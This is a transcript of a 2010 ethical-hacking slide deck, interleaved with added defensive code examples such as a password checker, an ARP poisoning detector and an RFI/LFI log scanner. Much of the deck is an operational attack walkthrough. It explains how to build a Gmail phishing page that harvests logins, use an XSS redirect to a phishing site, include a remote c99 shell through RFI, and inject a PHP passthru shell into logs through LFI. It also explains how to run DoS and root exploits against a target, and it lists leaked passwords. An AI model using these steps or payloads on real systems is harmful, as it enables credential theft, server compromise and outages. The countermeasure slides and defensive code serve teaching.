Ethical hacking & Information Security


This deals with Hacking fundamentals and how to make the systems secure from attacks


  • Excellent content. May I get a copy of your ppt please Sir.
  • May i get this ppt please..?
  • WHAT IS OXYMORONS
  • funny 6uy2
Ethical hacking & Information Security: Presentation Transcript

  • Ethical Hacking & Information Security: An Introduction. AK Dhamija (DIPR, DRDO), May 14, 2010
  • Overview
    1 Introduction: Hacker
    2 Password Hacking: Low Tech Methods, High Tech Methods, Countermeasures
    3 Web Hacking: Techniques, Countermeasures
    4 Network Hacking: Techniques, Countermeasures
    5 Windows Hacking
    6 Linux Hacking
    7 Wireless Hacking
    8 Malware
    9 References
  • Introduction
    Computer Security : CIA (Confidentiality, Integrity, Authentication)
    Computer Security, Network Security, Information Security are OXYMORONS
  • Introduction: Hacked Passwords
    Top ten most-popular passwords (in that order) from among 32 million hacked from RockYou.com:
    123456, 12345, 123456789, Password, iloveyou, princess, rockyou, 1234567, 12345678, abc123
    Imperva's study of "Consumer Password Worst Practices"
    • About 30 percent of users chose passwords whose length is equal to or below six characters.
    • Moreover, almost 60% of users chose their passwords from a limited set of alpha-numeric characters.
    • Nearly 50% of users used names, slang words, dictionary words or trivial passwords (consecutive digits, adjacent keyboard keys, and so on).
    Good Password Practices
    • It should contain at least eight characters.
    • It should contain a mix of four different types of characters: upper case letters, lower case letters, numbers, and special characters such as #$%&*,;" If there is only one letter or special character, it should not be either the first or last character in the password.
    • It should not be a name, a slang word, or any word in the dictionary. It should not include any part of your name or your e-mail address.
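The "Good Password Practices" rules above can be enforced at password-change time. The following checker is an added example, not part of the original slides; the tiny word list is constructed, and the look-alike substitution map and the three-character minimum for name fragments are assumptions.

```python
import re
import string

# Constructed sample list; a real deployment would load a full dictionary and
# a breached-password list (assumption, not part of the slides).
DICTIONARY = {"password", "iloveyou", "princess", "rockyou", "animal", "cheese"}

TOO_SHORT = "shorter than eight characters"
MISSING_TYPES = "missing character types: "
LONE_AT_EDGE = "the only {} is the first or last character"
DICTIONARY_WORD = "is a dictionary word (possibly with substitutions)"
PERSONAL = "contains part of the user's name or e-mail address"

# Letters and their common look-alike substitutions collapse to one symbol,
# so "animal" and "4n1m41" produce the same skeleton.
_SKELETON = str.maketrans({"a": "4", "@": "4", "e": "3", "i": "1", "l": "1",
                           "o": "0", "s": "5", "$": "5", "t": "7"})


def skeleton(text):
    """Lower-case text and fold look-alike characters together."""
    return text.lower().translate(_SKELETON)


DICTIONARY_SKELETONS = {skeleton(word) for word in DICTIONARY}


def check_password(pw, full_name="", email=""):
    """Return the list of violated rules; an empty list means pw passes."""
    problems = []
    if len(pw) < 8:
        problems.append(TOO_SHORT)

    # Rule: a mix of four character types.
    classes = {
        "upper": [c for c in pw if c.isupper()],
        "lower": [c for c in pw if c.islower()],
        "digit": [c for c in pw if c.isdigit()],
        "special": [c for c in pw if c in string.punctuation],
    }
    missing = [name for name, chars in classes.items() if not chars]
    if missing:
        problems.append(MISSING_TYPES + ", ".join(missing))

    # Rule: a lone letter or lone special character must not sit at either end.
    letters = classes["upper"] + classes["lower"]
    for label, chars in (("letter", letters),
                         ("special character", classes["special"])):
        if len(chars) == 1 and chars[0] in (pw[0], pw[-1]):
            problems.append(LONE_AT_EDGE.format(label))

    # Rule: not a dictionary word, also after trimming digits and punctuation
    # from the ends ("Password1") or undoing substitutions ("4n1m41").
    core = pw.strip(string.digits + string.punctuation)
    if {skeleton(pw), skeleton(core)} & DICTIONARY_SKELETONS:
        problems.append(DICTIONARY_WORD)

    # Rule: no part of the user's name or e-mail address.
    personal = (full_name + " " + email.split("@")[0]).lower()
    tokens = {t for t in re.split(r"[^a-z0-9]+", personal) if len(t) >= 3}
    if any(token in pw.lower() for token in tokens):
        problems.append(PERSONAL)
    return problems
```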
  • Introduction: Hacked Passwords
    Ditalee, Ditalee1, Ditalee3; iambhiku; pareekshanh84; *sha1973******; peter1; hemant; love25786; 080176; kingoforkut; iloveyou
  • Introduction: Hacker
    What is a Hacker?
    A hacker is someone who likes to tinker with electronics or computer systems: finding ways to make them do what they do better, or do things they weren't intended to do.
    Two types of Hacker
    • White Hat:
      • Good guys
      • Don't use their skills for illegal purposes
      • Computer security experts who help protect people from the Black Hats
    • Black Hat:
      • Bad guys
      • Use their skills maliciously for personal gain
      • Hack banks, steal credit cards, and deface websites
  • Introduction: Hacker Hierarchy
    • Script kiddies:
      • Wannabe hackers
      • Have no hacking skills and use the tools developed by other hackers
      • No knowledge of what's happening behind the scenes
    • Intermediate hackers:
      • Usually know about computers and networks, and have enough programming knowledge to understand what a script might do
      • Use pre-developed, well-known exploits (code that takes advantage of a bug or vulnerability) to carry out attacks
    • Elite hackers:
      • Skilled hackers
      • Write hacker tools and exploits
      • Break into systems and hide their tracks
  • Introduction: Becoming Hacker
    What does it take to become a hacker? Qualities needed:
    • Creativity
    • Will to learn
    • Knowledge is power
    • Patience
    • Programming to be an elite hacker
  • Password Hacking: Old Fashioned Low-Tech Methods
    • Social Engineering
      • Hacker takes advantage of trusting human beings to get information from them
      • e.g. a ploy to install a new security update on your computer
    • Shoulder surfing
    • Guessing
      • Weak passwords like date of birth, phone number, favorite pet etc.
  • Password Hacking: High Tech Methods
    • Gmail system administrator's automatic responder
    • Dictionary Attacks
    • Brute Force Attacks
    • Rainbow Tables
    • Phishing
    • GX Cookies
    • ARP Poisoning
  • High-Tech Techniques : Gmail system administrator's automatic responder
  • High-Tech Techniques : Dictionary Attacks
    • A text file full of commonly used passwords, or a list of every word from the dictionary, is used against a password database
    • Brutus, a very common password cracker
  • High-Tech Techniques : Dictionary Attacks
    IP masquerading, anonymous proxies and switching proxies are the techniques used to hide the IP
  • High-Tech Techniques : Brute-force Attacks
    • With time, brute-force attacks can crack any password
    • Try every possible combination of letters, numbers, and special characters until the right password is found
  • High-Tech Techniques : Rainbow Tables
    • A huge pre-computed list of hash values for every possible combination of characters
    • A hash is a one-way encryption, e.g. MD5
    • "cheese" run through the MD5 algorithm would be fea0f1f6fede90bd0a925b4194deac11
    • Having huge tables of every possible character combination hashed is a much better alternative to brute-force cracking
    • Once the rainbow tables are created, cracking the password is a hundred times faster than brute-forcing it
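Why precomputation works against unsalted hashes, and why a per-user salt with a slow key-derivation function defeats it, shown as an added example that is not part of the original slides. The candidate list is constructed, the table is a plain precomputed hash-to-password dictionary as the slide describes it (not a chain-based rainbow table), and the PBKDF2 parameters are assumptions.

```python
import hashlib
import hmac
import os

# Constructed candidate list standing in for the keyspace of a precomputed table.
CANDIDATES = ["123456", "password", "iloveyou", "cheese", "abc123"]


def md5_hex(password):
    """Unsalted MD5, the storage scheme the slide's example hash comes from."""
    return hashlib.md5(password.encode()).hexdigest()


def build_lookup(candidates):
    """Precompute hash -> password once; it is reusable against every database."""
    return {md5_hex(word): word for word in candidates}


def lookup(table, stored_hex):
    """Return the password for a stored hash, or None when the table has no entry."""
    return table.get(stored_hex)


def store_salted(password, salt=None, iterations=100_000):
    """Hardened storage: random per-user salt plus a deliberately slow KDF."""
    salt = salt or os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, derived


def verify_salted(password, record):
    """Recompute with the stored salt and compare in constant time."""
    salt, iterations, derived = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, derived)


if __name__ == "__main__":
    table = build_lookup(CANDIDATES)
    print("unsalted lookup:", lookup(table, md5_hex("cheese")))
    record = store_salted("cheese")
    print("salted lookup:  ", lookup(table, record[2].hex()))
    print("salted verify:  ", verify_salted("cheese", record))
```

Because every user gets a different salt, a table would have to be rebuilt per user, which removes the advantage of precomputing it.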
  • High-Tech Techniques : Phishing
    • Stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you're not
    • First the hacker chooses a target (Hotmail and Gmail)
    • Go to www.gmail.com and click File -> Save page as ...
    • Rename ServiceLogin.htm to index.htm
    • PHP script that logs and stores your login details when you click "Sign in"
    • Save this script into the same directory as you saved the Gmail page, and name it phish.php
    • Create a new empty text file and name it list.txt
  • High-Tech Techniques : Phishing PHP Script
  • High-Tech Techniques : Phishing
    • Open up the main Gmail page named index.htm with Notepad
    • Look for the first occurrence of the word "action" in the script
    • There are two "action" occurrences in the script, so make sure you have the right one by looking at the "form id" name above
    • Change the link between action = " " to phish.php. This will make the form submit to your PHP phish script instead of to Google
    • After the link you will see the code
    • Change the word "POST" to "GET" so that it looks like method="GET". This submits the information you type so that the PHP script can log it
    • Save and close the file
    • Upload the files to a free webhost that supports PHP
    • Change the file permission of "list.txt" to 777
    • http://www.yourwebhosturl.com/youraccount/list.txt will give you the username and password
  • High-Tech Techniques : GX Cookies
    • Cookies are used by web browsers to store your user information so that you can stay logged into a website even after you leave. By stealing your cookie, the attacker can sometimes log in without knowing your password
    • When users log in to a Gmail account, the Gmail server sends a cookie (a text file) to the browser
    • This file tells the Gmail server that you are authenticated. The cookie keeps you logged in for 2 weeks unless you press sign-out or delete the cookie
    • Even if you authenticate using SSL, you are not secure afterwards, because the results returned by the Gmail server come over an unencrypted connection
    • Every time you request anything from the Gmail server, like an image, your browser sends this cookie file to the Gmail server, and any attacker can easily get the cookie file by applying any network sniffer tool
    • The attacker then has your Gmail session ID, and using this session ID the attacker can easily log in to your Gmail account without needing any username and password
  • High-Tech Techniques : ARP Poisoning
    • Address Resolution Protocol (ARP) is a Layer 2 protocol
    • ARP poisoning allows an attacker to sniff data frames on a local area network (LAN), modify the traffic, or stop the traffic altogether
    • The aim is to associate the attacker's MAC address with the IP address of another node (such as the default gateway)
    • Any traffic meant for that IP address would be mistakenly sent to the attacker instead
    • The attacker could then choose to forward the traffic to the actual default gateway (passive sniffing) or modify the data before forwarding it (man-in-the-middle attack)
    • The attacker could also launch a denial-of-service attack against a victim by associating a nonexistent MAC address to the IP address of the victim's default gateway
    • ARP spoofing attacks can be run from a compromised host, or from an attacker's machine that is connected directly to the target Ethernet segment
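The poisoning described above leaves a visible trace in a host's ARP cache: the gateway's IP address suddenly maps to a different MAC address, often one already used by another host. The following detection sketch is an added example, not part of the original slides; the two `arp -an` style snapshots, addresses and finding names are constructed.

```python
import re
from collections import defaultdict

# Matches Linux `arp -an` lines such as:
#   ? (192.168.1.1) at 00:1a:2b:3c:4d:5e [ether] on eth0
ARP_LINE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)

GATEWAY = "192.168.1.1"  # constructed default-gateway address

# Constructed snapshot taken while the network was known to be clean.
BASELINE = """\
? (192.168.1.1) at 00:1a:2b:3c:4d:5e [ether] on eth0
? (192.168.1.20) at 00:1a:2b:aa:bb:01 [ether] on eth0
? (192.168.1.37) at 00:1a:2b:aa:bb:02 [ether] on eth0
"""

# Constructed later snapshot: the gateway now resolves to the MAC of .37.
CURRENT = """\
? (192.168.1.1) at 00:1a:2b:aa:bb:02 [ether] on eth0
? (192.168.1.20) at 00:1a:2b:aa:bb:01 [ether] on eth0
? (192.168.1.37) at 00:1a:2b:aa:bb:02 [ether] on eth0
? (192.168.1.50) at <incomplete> on eth0
"""


def parse_arp_table(text):
    """Return {ip: mac} for every resolved entry; incomplete entries are skipped."""
    table = {}
    for line in text.splitlines():
        match = ARP_LINE.search(line)
        if match:
            table[match["ip"]] = match["mac"].lower()
    return table


def find_anomalies(baseline, current, gateway_ip):
    """Compare two ARP tables and report signs of cache poisoning."""
    findings = []
    # 1. An IP whose MAC differs from the trusted baseline.
    for ip, mac in sorted(current.items()):
        known = baseline.get(ip)
        if known and known != mac:
            kind = "gateway-mac-changed" if ip == gateway_ip else "mac-changed"
            findings.append((kind, ip, known, mac))
    # 2. One MAC answering for several IPs (typical while traffic is relayed).
    ips_by_mac = defaultdict(list)
    for ip, mac in current.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            findings.append(("mac-claims-multiple-ips", mac, tuple(sorted(ips))))
    return findings


if __name__ == "__main__":
    for finding in find_anomalies(parse_arp_table(BASELINE),
                                  parse_arp_table(CURRENT), GATEWAY):
        print(finding)
```

A changed gateway MAC can also follow a legitimate hardware replacement, so a finding is a prompt to check the switch, not proof of an attack.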
  • Password Hacking: Countermeasures
    Social Engineering
    • Ask some questions that he should be able to answer to establish his legitimacy.
    • Some professionals study the company before attacking, so they might know all the answers.
    • In case of doubt, you should ask the head of whatever department the attacker claims to be from
    Shoulder Surfing
    • Make sure there is no one behind you attempting to peek
    • Don't keep any sticky notes lying around that have your password or password hints on them
    Guessing
    • Never use a password like your birth date, your mother's maiden name, your pet's name, your spouse's name, or anything that someone may be able to guess
    Gmail system administrator's automatic responder
    • Don't fall prey to such tactics
    • Don't respond to mails if you can't identify the sender
  • Password Hacking: Countermeasures
    Dictionary Attacks
    • Don't use a password that is in the dictionary
    • If you use a word from the dictionary but replace most of the letters with a number, you are not safe. A 1337 speak dictionary changes a word like "animal" to 4n1m41
    • Use something like doyoulikecheese?88
    Brute-force Attacks
    • Create a very long password and use many numbers and odd characters
    • Creating a phrase for your password is your best option for staying secure
    Rainbow Tables
    • Creating tables for passwords that are long takes a very long time and a lot of resources
    Phishing
    • Beware of gmail.randomsite.com, or gamilmail.com
    • When you are on the real Gmail website, the URL should begin with www.google.com; anything else is a fake
  • Password Hacking: Countermeasures
    GX Cookies
    • Do not use Gmail from public places, cybercafés and public wireless hotspots
    • Always use https://mail.google.com because this will access the SSL version of Gmail. It will be persistent over your entire session and not only during authentication
    ARP Poisoning
    • Static ARP inspection (SARPI) or dynamic ARP inspection (DARPI) approach on switched or hubbed LANs with or without DHCP
    • Always use https://mail.google.com because this will access the SSL version of Gmail. It will be persistent over your entire session and not only during authentication
  • Password Cracking: Other Programs
    • Cain and Abel
    • John the Ripper
    • THC Hydra
    • SolarWinds
    • RainbowCrack
  • Web Hacking: Techniques
    • Cross Site Scripting (XSS)
    • Remote File Inclusion (RFI)
    • Local File Inclusion (LFI)
  • Web Hacking: Cross Site Scripting (XSS)
    • User inputs malicious data into a website
    • Affected sites: FBI, CNN, Ebay, Apple, Microsoft, and AOL
    • Features commonly vulnerable to XSS attacks are
      • Search engines
      • Login forms
      • Comment fields
    • Three types of XSS attacks
      • Local
        • Rarest and hardest to pull off
        • Requires an exploit for a browser
        • Hacker can install worms, spambots, and backdoors onto your computer
      • Non-Persistent
        • Most common type of attack; doesn't harm the actual website
        • A client-side script or HTML is inserted into a variable, which causes the output that the user sees to be changed
        • Only activated when the user visits the URL crafted by the attacker
      • Persistent
        • Steal website cookies
        • Deface the website
        • Spread worms
  • Web Hacking: Cross Site Scripting (XSS)
    XSS : How can we say whether the site is vulnerable
    • If there is a search field, enter a word and if that word is displayed back to you on the next page, there's a chance it is vulnerable
    • Search for <h1>hi</h1>, and if the word "hi" is outputted as a big header, it is vulnerable
    • Search for <script>alert("hi");</script>, and if the word "hi" pops up in a popup box, then the site is vulnerable to XSS
    • These examples are non-persistent. Now if the hacker finds a guestbook etc., he can make it persistent and everyone that visits the page would get the above alert if that was part of his comment
    XSS for Phishing
    We want to craft a link pointing to the legit website (www.victim-site.com) that redirects to a phishing website
    • When JavaScript is inserted into the search box, a URL was formed that looked like
    • The code we typed into the search box was passed to the "searchbox" variable
    • Replace everything in between ?searchbox= and &search with JavaScript code <script>window.location = "http://phishing-site.com"</script>
    • Now when you go to the finished link, the legitimate site will redirect to the phishing website.
    • Encode the URL to make it look more legit - http://www.encodeurl.com/
    • It may look something like http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location+%3D+%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21
    • Once the victim sees that the link points to the legitimate website, he will be more likely to fall for the phishing attack
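The reflection test on this slide succeeds only when the page writes the "searchbox" value into HTML without encoding it. The following added example (not part of the original slides) puts an unencoded search page next to its output-encoded form, using the slide's own `<h1>hi</h1>` probe; the page template and function names are hypothetical.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The slide's header probe, URL-encoded into the "searchbox" parameter of the
# form.php page that the slide's encoded link refers to.
PROBE_URL = "http://localhost/form.php?searchbox=%3Ch1%3Ehi%3C%2Fh1%3E&search=search%21"


def search_term(url, param="searchbox"):
    """Extract and URL-decode one query parameter, as the web server would."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return values.get(param, [""])[0]


def render_vulnerable(term):
    """Hypothetical results page that echoes the term unencoded (reflected XSS)."""
    return (f'<input name="searchbox" value="{term}">'
            f"<p>Results for {term}</p>")


def render_hardened(term):
    """Same page with HTML output encoding applied at the point of output.

    quote=True also encodes quotes, which matters because the term is echoed
    inside an attribute value as well as in element content.
    """
    safe = html.escape(term, quote=True)
    return (f'<input name="searchbox" value="{safe}">'
            f"<p>Results for {safe}</p>")


if __name__ == "__main__":
    term = search_term(PROBE_URL)
    print("decoded term:", term)
    print("vulnerable:  ", render_vulnerable(term))
    print("hardened:    ", render_hardened(term))
```

With encoding in place the probe is displayed as literal text instead of being parsed as markup, so the "big header" test on the slide no longer succeeds.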
  • Web Hacking: Remote File Inclusion (RFI)
    RFI : How can we say whether the site is vulnerable
    • A remote file, usually a shell, is included into a website, which allows the hacker to execute server-side commands as the current logged-on user and have access to files on the server
    • Many servers are vulnerable to this kind of attack because of PHP's default settings of register_globals and allow_url_fopen being enabled
    • PHP 6.0 onwards, register_globals has been deprecated
    RFI : Exploiting the vulnerability
    • First the hacker would find a website that gets its pages via the PHP include() function and is vulnerable to RFI.
    • Many hackers use Google dorks to locate servers vulnerable to RFI.
    • A Google dork is the act of using Google's provided search tools to help get a specific search result, e.g. allinurl:.php?page= looks for URLs with .php?page= in them
    • To get relevant sites, switch around the word "page" with other letters and similar words
    • Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork
    • Websites that include pages have a navigation system similar to: http://target-site.com/index.php?page=PageName
    • To see if the page is vulnerable, the hacker would try to include a site instead of PageName, like http://target-site.com/index.php?page=http://google.com
    • If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell
  • Web Hacking Techniques: Remote File Inclusion (RFI)

    RFI: Exploiting the vulnerability
    • The most popular shells are c99 and r57. A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them (search inurl:c99.txt)
    • This will display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems
    • The new URL with the shell included would look like http://target-site.com/index.php?page=http://site.com/c99.txt?
    • Sometimes the PHP script on the server appends ".php", but "c99.txt.php" would not work
    • To get around this, you would add a null byte (%00) to the end of c99.txt. This tells the server to ignore everything after c99.txt
    • If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen
  • Web Hacking Techniques: Remote File Inclusion (RFI)

    RFI: Exploiting the vulnerability
    • The shell will display information about the remote server and list all the files and directories on it
    • From here the hacker would find a directory that has read and write privileges
    • Upload the shell as a .php file so that in case the vulnerability is fixed, he will be able to access it later on
    • Root privileges become vulnerable now by uploading and running local exploits against the server
    • He could also search the victim server for configuration files. These files may contain usernames and passwords for the MySQL databases etc.
  • Web Hacking Techniques: Local File Inclusion (LFI)

    LFI: How can we say whether the site is vulnerable
    • A site is vulnerable when you have the ability to browse through the server by means of directory traversal (discover the /etc/passwd file)
    • Vulnerable sites are found similarly to RFI (www.target-site.com/index.php?p=../../../../../../../etc/passwd)
    • The /etc/passwd file would display each line as username:passwd:UserID:GroupID:full name:directory:shell
    • e.g. Root:x:0:0::/root:/bin/bash
    • If the password hash was shown, the hacker would be able to crack it and get access to the machine
    • If the password is shadowed and in the /etc/shadow file, which the hacker doesn't have access to, then he may get access to the system through log injection
    • The log directories are located in different areas in different Linux distributions (find error.log, access.log, error_log, access_log etc.)

    LFI: Gaining access to the system through log injection
    • Search for the OS version of the target server, then search for where the log files are located on that OS
    • The hacker would then inject some PHP code into the logs by typing <? passthru($_GET[cmd]) ?> after = in the URL
    • This will cause the PHP script to be logged because there is no file by that name. This script will give the hacker shell access and allow him to execute system commands
    • If you go back to the log file, you will see that the PHP script wasn't parsed and was instead converted to %3C?%20passthru($_GET[cmd])%20?%3E
    • When we submitted the script, the browser automatically encoded the URL. We can use a Perl script that can get around this problem
  • Web Hacking Techniques: Local File Inclusion (LFI)

    LFI: Gaining access to the system through log injection
    • Edit the variables site, path, code, and log to the appropriate information
    • Once the hacker runs this script and it completes successfully, he can run any command on the server
    • From here he can run any local exploits to gain root, or just browse the server files
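From the defender's side, each RFI and LFI step described on these slides leaves a recognizable request in the web server's access log. The following is an added example, not part of the original slides: a small detector run over constructed Apache-style log lines. The log format, rule names, addresses and the host site.example are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (documentation IP ranges, made-up sizes).
SAMPLE_LOG = '''\
203.0.113.5 - - [14/May/2010:10:00:01 +0000] "GET /index.php?page=contact HTTP/1.1" 200 512
203.0.113.9 - - [14/May/2010:10:00:07 +0000] "GET /index.php?page=http://site.example/c99.txt? HTTP/1.1" 200 9001
203.0.113.9 - - [14/May/2010:10:00:09 +0000] "GET /index.php?p=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1300
203.0.113.9 - - [14/May/2010:10:00:12 +0000] "GET /index.php?p=%3C?%20passthru($_GET[cmd])%20?%3E HTTP/1.1" 404 208
'''

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# One rule per technique on the slides, applied to decoded parameter values.
RULES = {
    "remote_include": re.compile(r'^\s*(?:https?|ftp)://', re.I),  # page=http://...
    "path_traversal": re.compile(r'\.\.[/\\]'),                    # ../../etc/passwd
    "null_byte": re.compile(r'\x00'),                              # %00 truncation
    "php_code": re.compile(r'<\?'),                                # log injection
}


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Return a finding dict for a suspicious request, or None."""
    match = REQUEST_RE.match(line)
    if not match:
        return None
    client, _method, target, status = match.groups()
    _path, _, query = target.partition('?')
    hits = set()
    for pair in query.split('&'):
        _name, _, raw_value = pair.partition('=')
        value = fully_decode(raw_value)
        hits.update(name for name, rule in RULES.items() if rule.search(value))
    if not hits:
        return None
    return {"client": client, "status": int(status),
            "target": target, "rules": sorted(hits)}


def scan_log(text):
    """Scan every line of a log and keep only the findings."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], finding["status"], finding["rules"])
```

A `php_code` hit is worth correlating with a later request that includes the log file itself, since that pairing is the log-injection sequence the slide describes.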
  • Web Hacking Countermeasures: Web Hacking

    Countermeasures
    • Make sure you are using up-to-date scripts
    • Make sure your server's php.ini file has register_globals and allow_url_fopen disabled
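One way to check the php.ini countermeasure is to audit the file for an explicit "off" value on each directive. The following is an added example, not part of the original slides. It also checks allow_url_include, which is an addition here (the PHP directive that controls URL wrappers inside include()), and the sample ini text and function names are constructed.

```python
import re

# The two directives the slide names, plus allow_url_include (added here).
REQUIRED_OFF = ("register_globals", "allow_url_fopen", "allow_url_include")

TRUTHY = {"1", "on", "true", "yes"}
FALSY = {"0", "off", "false", "no", "none", ""}

LINE_RE = re.compile(r'^([A-Za-z_][\w.]*)\s*=\s*(.*)$')

# Constructed sample files.
WEAK_INI = '''\
[PHP]
register_globals = On
register_globals = Off   ; the last assignment is the one kept
allow_url_fopen = "On"
;allow_url_include = Off
'''

HARDENED_INI = '''\
[PHP]
register_globals = Off
allow_url_fopen = 0
allow_url_include = Off
'''


def parse_php_ini(text):
    """Collect directive values; ';' starts a comment, [sections] are skipped.
    Sufficient for boolean directives (values containing ';' are not handled)."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(';', 1)[0].strip()
        if not line or line.startswith('['):
            continue
        match = LINE_RE.match(line)
        if match:
            # Directive names are case sensitive, so the key is kept as written.
            settings[match.group(1)] = match.group(2).strip().strip('"\'')
    return settings


def audit(text):
    """Classify each required directive as disabled, enabled, unset or unrecognized."""
    settings = parse_php_ini(text)
    report = {}
    for name in REQUIRED_OFF:
        if name not in settings:
            report[name] = "unset"        # commented out or missing: not verified off
        elif settings[name].lower() in FALSY:
            report[name] = "disabled"
        elif settings[name].lower() in TRUTHY:
            report[name] = "enabled"
        else:
            report[name] = "unrecognized"
    return report


def failing(report):
    """Directives that are not explicitly disabled."""
    return [name for name in REQUIRED_OFF if report[name] != "disabled"]


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, audit(ini), "->", failing(audit(ini)) or "ok")
```
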
  • Network Hacking: Network Hacking

    Techniques
    • Footprinting
    • Port Scanning
    • Banner Grabbing
    • Searching for Vulnerabilities
    • Penetrating
  • Network Hacking Techniques: Footprinting

    Footprinting
    • To hack a system the hacker must first know everything there is to know about it
    • Gathering information about a computer system and the companies it belongs to

    Footprinting Steps
    • A hacker would start gathering information on the target's website. Things to look for are e-mails and names
    • Get the IP address of the website
    • Ping the server to see if it is up and running
    • Do a Whois lookup on the company website. Go to http://whois.domaintools.com and put in the target website
    • You see the company e-mails, address, names, when the domain was created, when the domain expires, the domain name servers, and more!
    • A hacker can also take advantage of search engines to search sites for data
    • "site:www.the-target-site.com" will display every page that Google has of the website
    • "site:www.the-target-site.com email" will list several e-mails that are published on the website
    • "inurl:robots.txt" would look for a page called robots.txt, which displays all the directories and pages on the website that they wish to keep anonymous from the search engine spiders
  • Network Hacking Techniques: Port Scanning

    Port Scanning
    • Detect the services listening on the server's open ports so as to detect the vulnerabilities
    • The Nmap Security Scanner is available for both Mac and Windows users: http://nmap.org/download.html

    Port Scanning Steps
    • Choose a target and place it in the target box
    • Choose the "Profile"
  • Network Hacking Techniques: Port Scanning

    Port Scanning Steps
    • A sample scan result may look like
    • List of some of the most popular ports/services on the internet
    • The hacker also needs to find out what operating system the server is running (visiting a non-existent page gives a 404 error page which shows the OS)
  • Network Hacking Techniques: Banner Grabbing

    Banner Grabbing
    • To find out the software and its version, which is needed to search for a vulnerability

    Banner Grabbing Steps
    • Telnet into the service port to figure out the software and version of the service
    • If you are using Windows Vista, then telnet is not installed by default. Use Control Panel - Programs and Features - Turn Windows features on or off - Telnet Client to install it
    • If you found port 21 (i.e. FTP) open, then run telnet www.targetsite.com 21 to find out the FTP software
    • Use Nmap's full version detection option to get this information if telnet doesn't work
  • Network Hacking Techniques: Searching for Vulnerabilities

    Searching for Vulnerabilities
    • Search a couple of vulnerability databases for an exploit
    • If there's an exploit available, run it against the server and take complete control
    • Popular exploit databases are Milw0rm, SecurityFocus, osvdb
    • If there isn't any, you can move on to another open port and try again on a different service. Alternatively, develop a "0-day" exploit
      • No one knows about the vulnerability; hundreds of websites can be hacked before the vulnerability is discovered and patched
      • The hacker could sell the vulnerability for thousands of dollars
      • It shows that the hacker is very skillful and raises his rank in the hacker community

    Attacks used against discovered vulnerabilities
    • Denial-of-Service (DoS): Send a flood of information to the target server, causing it to use up all of its resources and in return pushing it offline, or deny requests to others
    • Buffer Overflow (BoF): The extra information overflows into other buffers, causing them to be overwritten with malicious code created by the hacker. Once this code is executed, the hacker can receive full control of the server
  • Network Hacking Techniques: Searching for Vulnerabilities

    Types of Exploits
    • Local Exploit: You must first have access and privileges on the machine. Local exploits are usually used to escalate one's privileges to admin or root
    • Remote Exploit: It isn't run locally, but launched from anywhere across the internet
    • A hacker usually has to use a combination of both remote and local exploits to gain full control of a system. For example, the hacker may have been able to gain regular privileges with a remote exploit attack, and then be able to escalate to root privileges with the help of a local exploit
  • Network Hacking Techniques: Penetrating

    Penetrating
    • Running the exploits against the target and penetrating the server

    DoS PHP exploit: http://milw0rm.com/exploits/2901
    • Install PHP onto your computer. WAMP is a free web server that comes with PHP
    • Paste the PHP exploit into Notepad or any word processor and save it as "exploit.php"
    • On line 13 of this exploit you will see: $address = gethostbyname('192.168.1.3'); edit here the IP address of the target
    • Save this edited file into the PHP directory on your server that contains the PHP executable file. In WAMP the directory would be C:\wamp\bin\php\php5.2.5
    • To run it, simply type in "php exploit.php" and hit enter
    • When skilled hackers create exploits, they sometimes insert mistakes or extra code so that script kiddies with no programming knowledge wouldn't be able to use them
    • At line 18 of this exploit, we see $junk.="../../../sun-tzu/../../../sun-tzu/../../../sun-tzu"; just remove this line and the error will disappear
    • A DoS attack will be launched against the target website up until you exit the command screen
    • The site will begin to lag and it'll take a long time to load pages. Eventually the server may go down completely
  • Network Hacking Techniques: Penetrating

    DoS Perl exploit: http://milw0rm.com/exploits/6581
    • Download and install the appropriate version of ActivePerl
    • Edit the options like the target server and others as needed. Then save the file as "exploit.pl". As you can see, Perl exploits begin with "#!/usr/bin/perl"
    • Run the exploit by typing: "perl exploit.pl"

    Python, C/C++ on Linux
    • Python exploit: http://milw0rm.com/exploits/3523
    • Most C/C++ exploit code is made to be compiled in Linux
    • Save the remote root exploit http://milw0rm.com/exploits/269 as "exploit.c"
    • Install a development package of all the libraries and headers needed to compile C/C++ scripts with sudo apt-get install build-essential
    • Once the hacker ran the script against a vulnerable server running BeroFTPD 1.3.4 and the script worked, the hacker would now have root access to the server
  • Network Hacking Techniques: Penetrating

    C/C++ on Windows
    • To run in Windows, you can use Cygwin
    • Cygwin is a Linux-like environment that runs in Windows and acts as a Linux emulation layer, allowing you to run Linux scripts in Windows
    • Download Cygwin from http://www.cygwin.com/
    • Using the same exploit as the last example, save and move it into the "C:\cygwin" directory as "exploit.c"
